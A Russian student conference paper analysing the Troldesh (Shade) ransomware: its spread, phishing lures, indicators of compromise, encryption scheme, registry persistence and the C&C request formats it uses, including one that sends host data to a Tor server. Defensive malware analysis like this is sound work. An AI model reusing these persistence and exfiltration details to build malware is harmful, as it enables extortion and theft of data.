Телефон: 8-800-350-22-65
WhatsApp: 8-800-350-22-65
Telegram: sibac
Прием заявок круглосуточно
График работы офиса: с 9.00 до 18.00 Нск (5.00 - 14.00 Мск)

Статья опубликована в рамках: XXI Международной научно-практической конференции «Вопросы технических и физико-математических наук в свете современных исследований» (Россия, г. Новосибирск, 25 ноября 2019 г.)

Наука: Информационные технологии

Секция: Вычислительные машины, комплексы и компьютерные сети

Скачать книгу(-и): Сборник статей конференции

Библиографическое описание:
Абрамович М.С., Гурбатов Г.О., Паничев А.Д. [и др.] ИССЛЕДОВАНИЕ ВИРУСА-ШИФРОВАЛЬЩИКА “TROLDESH” // Вопросы технических и физико-математических наук в свете современных исследований: сб. ст. по матер. XXI междунар. науч.-практ. конф. № 11(17). – Новосибирск: СибАК, 2019. – С. 5-17.
Проголосовать за статью
Дипломы участников
У данной статьи нет
дипломов

ИССЛЕДОВАНИЕ ВИРУСА-ШИФРОВАЛЬЩИКА “TROLDESH”

Абрамович Михаил Сергеевич

студент Санкт-Петербургский государственный университет телекоммуникаций имени проф. М.А. Бонч-Бруевича,

РФ, г. Санкт-Петербург

Гурбатов Глеб Олегович

студент Санкт-Петербургский государственный университет телекоммуникаций имени проф. М.А. Бонч-Бруевича,

РФ, г. Санкт-Петербург

Паничев Артем Дмитриевич

студент Санкт-Петербургский государственный университет телекоммуникаций имени проф. М.А. Бонч-Бруевича,

РФ, г. Санкт-Петербург

Черкасов Егор Павлович

студент Санкт-Петербургский государственный университет телекоммуникаций имени проф. М.А. Бонч-Бруевича,

РФ, г. Санкт-Петербург

INVESTIGATION OF THE RANSOMWARE “TROLDESH”

 

M.S. Abramovich

student of the SPbSUT named after prof. Bonch-Bruevich,

Russia, Saint Petersburg

G.O. Gurbatov

student of the SPbSUT named after prof. Bonch-Bruevich,

Russia, Saint Petersburg

A.D. Panichev

student of the SPbSUT named after prof. Bonch-Bruevich,

Russia, Saint Petersburg

E.P. Cherkasov

student of the SPbSUT named after prof. Bonch-Bruevich,

Russia, Saint Petersburg

 

АННОТАЦИЯ

Рассмотрены основные особенности и принципы работы вируса-шифровальщика “Troldesh”, который является троянской программой класса «Shade». Также проанализированы активность вируса и его территориальное распространение.

ABSTRACT

There were examined main features and principles of the “Troldesh” ransomware virus, which is an example of the “Shade” class of Trojan program. In addition, there was analysis of virus activity and its territorial distribution.

 

Ключевые слова: компьютерные вирусы, анализ, распростра­нение, шифровальщик, троянская программа.

Keywords: computer viruses, analysis, distribution, ransomware, Trojan programs.

 

В данной публикации рассмотрены пути распространения, активность и принципы работы вируса-шифровальщика ”Troldesh”, который также является троянской программой класса «Shade». Более того, ”Troldesh” может быть известен как: «Shade», «XTBL», «Trojan.Encoder.858», «Da Vinci», «No_more_ransome», «Trojan-Ransom. Win32.Shade». Для более удобного восприятия текста публикация поделена на несколько частей: история возникновения вируса-шифровальщика, статистический анализ атак, принципы работы и особенности внедрения вируса, выводы.

1. История возникновения и обнаружения “Troldesh

Первая модификация вируса “Troldesh” была зафиксирована в 2015 году, и уже тогда она успешно обходила многие антивирусные защиты, а к середине 2019 года активность “Troldesh” достигла пика. На данный момент “Troldesh” распространяется в основном через фишинговые письма, публикации в социальных сетях и сообщения в мес­сенджерах. Как правило, мошенники обманным способом стараются заставить жертву перейти по подозрительной ссылке, скачать или запустить зловредный файл. Известно, что в рассылке вируса задейство­вана сложная инфраструктура, включающая в себя подключенные к интернету периферийные устройства. На рисунке 1 представлен пример такой рассылки.

 

Рисунок 1. Пример фишингового письма

 

По данным компании “Group-IB”, появившись в 2015 году, к концу 2018 года “Troldesh” стал одним из самых популярных вирусов-шифровальщиков и уверенно вошел в тройку лидеров, наряду с печально известными зловредными программами “RTM” и “Pony”. Для прикрытия злоумышленники отправляют вредоносный код от таких компаний как: «Полярные авиалинии», «Рольф», «РБК», «Новосибирск-Online», «Бинбанк» и другие, используя вложенные ссылки переадре­сации на специально созданные мошенниками сайты.

К сожалению, утилиты для расшифровки файлов, зашифрованных вирусом “Troldesh”, пока не существует, и неизвестно, появится ли она. Крайне желательно, чтобы у пользователя, ставшего жертвой данного шифровальщика, была функция корзины — на тот случай, если вирус удалит исходники файлов, заменив их зашифрованными данными, и изменения успеют синхронизироваться с сервером.

2. Статистический анализ атак и территориальное распространение “Troldesh

Говоря о распространении “Troldesh”, нельзя не заметить того, что кампания по распространению вируса-шифровальщика развивается с каждым месяцем. Так в октябре 2018 года началось массовое распространение “Troldesh”. Данная волна активности длилась до декабря 2018 года, а затем последовал перерыв на рождественские праздники. В середине января активность кампании по распространению вируса удвоилась по сравнению с октябрем. Данная информация отображена на графике, построенном на данных компании “Group-IB” – рисунок 2.

 

Рисунок 2. Количество заражений “Troldesh” с октября 2018 года по январь 2019 года

 

После января 2019 года активность вымогателей явно снизилась, об этом свидетельствует график на рисунке 3.

 

Рисунок 3. Количество заражений “Troldesh” с января 2019 года по июль 2019 года

 

Падения на графике, соответствующие выходным дням, говорят о том, что атакующие предпочитают рабочие дни для попыток заражения, поэтому в основном используют корпоративные адреса электронной почты.

Возвращаясь к статистике, только в июне 2019 года “Group-IB” обнаружила более 1100 фишинговых писем, содержащих “Troldesh”. Всего же во втором квартале 2019 года количество таких писем превы­сило 6 000. Дополняя эти слова, компания “Avast” отразила более 100 тысяч попыток атак на пользователей за 2019 год.

Наибольшее количество заражений было обнаружено в СНГ – более 80%, а именно на территории Российской Федерации – их порядка 71%. К удивлению, Германия занимает второе место по количеству заражений “Troldesh” с 8.42% из всех заражений. Украина имеет 6.48% заражений, а Австрия 3.91%. Данная информация успешно отображена на рисунках 4 и 5.

 

Рисунок 4. Количество заражений вирусом “Troldesh” по странам на географической карте

 

Рисунок 5. Количество заражений вирусом “Troldesh” по странам по убыванию

 

3. Принципы работы и особенности внедрения вируса-шифровальщика “Troldesh

Начать хотелось бы со списка, описывающего каким образом “Troldesh” может заразить пользователя:

  • Email-спам содержащие вредоносные ссылки и/или вложения.
  • Фишинг-письма со вложениями и/или ссылками от вполне леги­тимных отправителей на заражённые набором эксплойтов Axpergle или Neclu (Nuclear) сайты.
  • Ботнет, в частности Kelihos (Waledac).
  • При установке другого вредоносного ПО как, например, при комбинированной атаке “Pony”, “Teamspy RAT” и других троянских программ.

Фишинг-письма и email-спам могут иметь следующие заголовки (темы письма): Жалоба, Уведомление, Сообщение из банка (суда, налоговой, от кредиторов), Задолженность, Уголовное производство, Счет-фактура, Доставка, Посылка и другие слова, заставляющие полу­чателя заинтересоваться и открыть письмо.

Были разоблачены некоторые почтовые адреса и адреса сайтов, используемых злоумышленниками. Фишинговые почтовые адреса: decode00001@gmail. com, decode00002@gmail. com, decode77777@gmail. com, decode99999@gmail. com, files000001@gmail. com, files640@gmail. com, files08880@gmail. com,files08881@gmail. com. Зловредные сайты, находятся в пределах сети Tor: gxyvmhc55s4fss2q.onion/reg***, gxyvmhc55s4fss2q.onion/prog***, gxyvmhc55s4fss2q.onion/err***, gxyvmhc55s4fss2q.onion/cmd***, gxyvmhc55s4fss2q.onion/sys***.

Ниже представлены примеры хэш-функций вредоносных Zip-вложений:

«0A76B1761EFB5AE9B70AF7850EFB77C740C26F82»

«D072C6C25FEDB2DDF5582FA705255834D9BC9955»

«80FDB89B5293C4426AD4D6C32CDC7E5AE32E969A»

«5DD83A36DDA8C12AE77F8F65A1BEA804A1DF8E8B»

«6EA6A1F6CA1B0573C139239C41B8820AED24F6AC»

«43FD3999FB78C1C3ED9DE4BD41BCF206B74D2C76»

Детектирование было совершено антивирусом “ESET”: JS/Danger.ScriptAttachment

Более того, “Troldesh” умеет шифровать более 200 разных расшире­ний, что в очередной раз доказывает его способности к массовому распространению. Подтверждению данной информации можно найти на рисунке 6, который показывает часть кода “Troldesh”.

 

Рисунок 6. Список шифруемых расширений файлов вирусом “Troldesh”

 

Порядок работы вируса-шифровальщика “Troldesh” можно описать следующим списком:

  1. “Troldesh” шифрует данные пользователей с помощью AES-256.
  2. Затем обои рабочего стола изменяются на изображение с сообщением на русском и английском языках о том, что файлы были зашифрованы. В качестве обоев “Troldesh” использует bmp-изображение, которое, как правило, размещается в директории %APPDATA%\Roaming. В качестве примера, полный путь к данному изображению может выглядеть следующим образом: C:\Users\User\AppData\Roaming\0ED528EB0ED528EB.bmp.
  3. Далее на рабочем столе появляется множество текстовых документов README.txt шантажируемого содержания. Данный файл представлен на рисунке 7.
  4. Затем жертве требуется отправить на e-mail вымогателя код из записки о выкупе, чтобы получить дальнейшие инструкции.
  5. В ответном письме сообщается сумма выкупа в сотнях долларов.

 

Рисунок 7. Образец файла README.txt

 

Существует два основных метода заражения с помощью вируса-шифровальщика “Troldesh”: через вложение в письме или после перехода на вредоносный сайт.

В первом случае жертва получает письмо, в которое вложен испол­няемый вредоносный файл. Заражение системы происходит после попытки открыть вложение. Например, при распространении ”Trojan-Ransom.Win32.Shade” (другое имя “Troldesh”) использовались следующие имена файлов: doc_dlea podpisi.com, doc_dlea podpisi.rar, documenti_589965465_documenti.com, documenti_589965465_documenti.rar, documenti_589965465_doc.scr, doc_dlea podpisi.rar. Стоит отметить, что имя файла меняется при каждой волне рассылки, и возможные варианты не ограничиваются перечисленными выше.

Второй способ распространения осуществляется с помощью эксплойт-кит. Несомненно, он более опасен, поскольку заражение происходит без участия пользователя, когда жертва посещает скомпро­метированный веб-сайт. Это может быть, как сайт злоумышленников, так и вполне легальный, но взломанный ресурс. Чаще всего пользователь не знает, что сайт представляет собой какую-то опасность. Вредоносный код на сайте эксплуатирует уязвимость в браузере или его плагинах, после чего в скрытном режиме в систему устанавливается целевой троянец. В этом случае, в отличие от спам-письма, от жертвы даже не требуется запускать исполняемый файл.

После того как “Trojan-Ransom.Win32.Shade” попал в систему, он соединяется с C&C сервером, располагающимся в сети Tor, сообщает о заражении и запрашивает открытый ключ RSA-3072, который впослед­ствии использует при шифровании файлов. Если вдруг соединение не удалось установить, вирус выбирает один из 100 открытых ключей, содержащихся в его теле как раз для такого случая. Затем троянец приступает к шифрованию файлов. При поиске объектов шифрования он пользуется статическим списком расширений.

Код, который пользователям предлагается отправить по электронной почте злоумышленникам, может иметь вид ID|0 в случае, если публичный ключ был получен с C&C сервера, или ID|key_number|build|version в случае, если был выбран один из встроен­ных в код шифровальщика публичных ключей RSA с номером key_number. ID обозначает иденти­фикатор зараженного компьютера, а два числа build и version обозначают ID и версию конкретного вируса-шифровальщика.

При анализе образцов зловреда были обнаружены различные комбинации значений build, адресов почты для связи пользователей со злоумышленниками и адресов C&C. Разным значениям build соответствуют разные почтовые адреса, которые уже были упомянуты в статье, при этом один и тот же C&C может обслуживать несколько разных вирусов. Данная информация проиллюстрирована на рисунке 8.

 

Рисунок 8. Почтовые адреса мошенников и соответствующие им C&C центры и ID “Troldesh”

 

Создание следующих файлов при выполнении вредоноса:

%Windir%\csrss.exe, %AllUsersProfile%\Drivers\csrss.exe, %Windir%\<random_hex_chars>.exe, %Temp%\lock%Temp%\state, %UserProfile%\Application Data\<random_name>.bmp.

Затем создается следующая запись в реестре, чтобы файлы выполня­лись при каждом запуске Windows:

“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"Client Server Runtime Subsystem" = "%Windir%\csrss.exe”.

Однако в отличие от большинства других шифровальщиков, на этом “Troldesh” не останавливается. Он не завершает свой процесс, а запускает бесконечный цикл, в котором запрашивает от C&C сервера список адре­сов вредоносного ПО, затем скачивает и станавливает это ПО в систему. Код цикла скачивания и ожидания состоит из запросов “push”, “mov”, “call” и других представленных на рисунке 9.

 

Рисунок 9. Код цикла скачивания и ожидания вредоносного ПО вируса “Troldesh”

 

В дополнение, такой функционал характерен для ботов-загрузчиков. Во время заражений были выявлены факты скачивания представи­телей семейств: “Trojan.Win32.CMSBrute”, “Trojan.Win32.Muref”, “Trojan.Win32.Kovter”, “Trojan-Downloader.Win32.Zemo”.

Для шифрования файлов применяется алгоритм AES-256 в режи­ме CBC. Для каждого кодируемого файла генерируется два случайных 256-битных ключа AES: один используется для шифрования содержи­мого файла, второй – для шифрования имени файла. Данные ключи помещаются в служебную структуру key_data, изображенную на рисунке 7, которая сама шифруется выбранным ключом RSA и занимает 384 байта после зашифровки. Также key_data помещается в конец кодируемого файла. Далее троянец пытается переименовать закодиро­ванный файл, выбирая в качестве нового имени результат вычисления Base64(AES_encrypt(оригинальное_имя_файла)).xtbl. В случае неуспеха “Troldesh” просто дописывает к оригинальному имени файла расшире­ние .ytbl. В более поздних версиях перед расширением .xtbl стал приписываться ID зараженного компьютера, например, «ArSxrr+acw970LFQw.043C17E72A1E91C6AE29.xtbl.».

 

Рисунок 10. Код служебной структуры key_data вируса “Troldesh”

 

Примеры хэш-функций шифровальщиков класса “Shade”:

«FEB458152108F81B3525B9AED2F6EB0F22AF0866»

«7AB40CD49B54427C607327FFF7AD879F926F685F»

«441CFA1600E771AA8A78482963EBF278C297F81A»

«9023B108989B61223C9DC23A8FB1EF7CD82EA66B»

«D8418DF846E93DA657312ACD64A671887E8D0FA7»

Кроме того, загрузчик пытается маскироваться, выдавая себя за легитимный системный процесс Client Server Runtime Process (csrss.exe). Он копирует себя в C:\ProgramData\Windows\csrss.exе, где Windows – скрытая папка, созданная загрузчиком; обычно в ProgramData этой папки нет. В качестве примера на рисунке 11 представлен код системного процесса Client Server Runtime Process, который по своей сути является вредоносным ПО.

 

Рисунок 11. Вредоносный загрузчик, маскирующийся под системный легитимный процесс

 

Ниже представлен примеры хэш-функций вредоносного загрузчика на JavaScript:

«37A70B19934A71DC3E44201A451C89E8FF485009»

«08C8649E0B7ED2F393A3A9E3ECED89581E0F9C9E»

«E6A7DAF3B1348AB376A6840FF12F36A137D74202»

«1F1D2EEC68BBEC77AFAE4631419E900C30E09C2F»

«CC4BD14B5C6085CFF623A6244E0CAEE2F0EBAF8C»

Также хотелось бы углубиться в процесс генерации иденти­фикатора зараженного устройства. Сперва, троянец получает имя компьютера (comp_name) с помощью API-функции GetComputerName и число процессоров (num_cpu) с помощью API-функции GetSystemInfo. После на основе серийного номера системного тома вычисляет 32-битную константу и конвертирует в hex-строку (vol_const). Далее “Troldesh” получает данные о версии ОС (os_version), разделенные символом “;” (например, “5;1;2600;1;Service Pack 3”). После этого шага он форми­рует строку comp_namenum_cpuvol_constos_version; и вычисляет MD5 хэш-функцию от этой строки. В завершении процесса “Troldesh” кон­вертирует MD5-хэш в hex-строку и берет из нее первые 20 символов. В результате полученный результат используется в качестве ID компьютера.

После генерации ID зараженного устройства осуществляется попытка подключиться к C&C серверу, находящемуся в сети Tor, отправить ему ID компьютера и в ответ получить публичный RSA-ключ. В случае неуспеха, как было описано ранее, выбирается один из 100 зашитых в троянце публичных RSA-ключей.

Также, помимо всего упомянутого, в теле “Troldesh” содержится адрес только одного сервера C&C. Сами серверы находятся в сети Tor, коммуникация с ними осуществляется с использованием статически «прилинкованного» к троянцу клиента Tor. Более того, “Troldesh” отправ­ляет запросы на C&C сервер следующих видов:

  • Запрос нового публичного ключа RSA:

GET http://<server>.onion/reg.php?i=ID&b=build&v=version&ss=stage 

ID – идентификатор зараженного компьютера;

build – идентификатор конкретного сэмпла зловреда;

version – версия зловреда, были встречены версии 1 и 2;

stage обозначает этап шифрования – запрос нового публичного ключа RSA или сообщение о завершении шифрования файлов.

  • Сообщение об ошибке:

GET http://<server>.onion/err.php?i=ID&b=build&v=version&err=error

error – base64-закодированное сообщение о произошедшей при шифровании ошибке.

  • Сводка о текущей стадии работы шифровальщика:

GET http://<server>.onion/prog.php?i=ID&b=build&v=version&ss=stage&c=count&f=finish

count – текущее количество зашифрованных файлов;

finish – флаг окончания шифрования.

  • Информация о системе:

POST http://<server>.onion/sys.php?i=ID&b=build&v=version&ss=stage&c=count&k=key_number&si=info

key_number – номер выбранного ключа RSA (в случае, если ключ не был получен от сервера, а был выбран из содержащихся в теле зловерда);

info – информация, полученная с зараженного компьютера: Имя компьютера, Имя пользователя, IP-адрес, Домен компьютера, Список логических дисков, Версия ОС Windows, Список установленного ПО.

  • Запрос списка URL-адресов, с которых требуется скачать и запустить дополнительное вредоносное ПО:

GET http://<server>.onion/cmd.php?i=ID&b=build&v=version

4. Выводы о вирусе-шифровальщике “Troldesh

Для начала вирус написан на C++ с применением STL и соб­ственных классов. Он статически «слинкован» с клиентом Tor с целью загрузки вредоносного ПО на зараженное устройство. “Troldesh” использует библиотеки boost (threads), curl, OpenSSL. В каждый образец вируса вписан адрес одного сервера C&C. Всего в разных образцах были найдены адреса 10 C&C серверов, 8 из которых активны в настоящее время. Разумеется, все серверы расположены в сети Tor. Все строки (вместе с именами импортируемых функций) зашифрованы алгоритмом AES, расшифровываются при старте программы, после чего происходит динамическое заполнение таблицы импорта. “Troldesh” перед установкой своих обоев сохраняет старые обои в реестре. Шифровальщик обычно упакован UPX и дополнительным упаковщиком, в распакованном виде имеет размер 1817 КБ. На зараженном компьютере вирус создает 10 оди­наковых файлов README1.txt, … README10.txt с требованиями выкупа на русском и английском языках. Для шифрования содержимого каждого файла и имени каждого файла генерируется уникальный 256-битный ключ AES, шифрование осуществляется в режиме CBC с нулевым начальным вектором. “Troldesh” содержит 100 публичных ключей RSA-3072 с открытой экспонентой 65537. Всего в разных образцах вируса было обнаружено около 300 различных публичных ключей.

 

Список литературы:

  1. Ализар, А. Идёт массовая рассылка шифровируса Troldesh от имени российских компаний [Электронный ресурс] / А. Ализар – Электрон. текстовые дан. – 2019. – Режим доступа: https://habr.com/ru/news/t/457572/  
  2. Герасюкова, М. Шифрует все: Россию атаковал опасный вирус [Электронный ресурс] / М. Герасюкова – Электрон. текстовые дан. – 2019. – Режим доступа: https://www.gazeta.ru/tech/2019/06/24/12438187/ransomware_rus.shtml
  3. Каргалев, Я. Новая кампания вируса-шифровальщика Troldesh: зараженные письма идут от имени авиакомпаний, автодилеров и СМИ [Электронный ресурс] / Я. Каргалев – Электрон. текстовые дан. – 2019. – Режим доступа: https://www.group-ib.ru/media/troldesh/  
  4. Элдер, Дж. Вирус-вымогатель Troldesh широко распространяется по всему миру. Под основным ударом находятся Россия, США и Мексика. [Электронный ресурс] / Дж. Элдер – Электрон. текстовые дан. – 2019. – Режим доступа: https://blog.avast.com/ru/avast-zafiksiroval-novuyu-volnu-atak-shifrovalschika-troldesh  
  5. Алюшин, В. Шифровальщик Shade: двойная угроза [Электронный ресурс] / В. Алюшин, Ф. Синицын Электрон. текстовые дан. – 2019. – Режим доступа: https://securelist.ru/shifrovalshhik-shade-dvojnaya-ugroza/26790/
Проголосовать за статью
Дипломы участников
У данной статьи нет
дипломов

Оставить комментарий

Форма обратной связи о взаимодействии с сайтом
CAPTCHA
Этот вопрос задается для того, чтобы выяснить, являетесь ли Вы человеком или представляете из себя автоматическую спам-рассылку.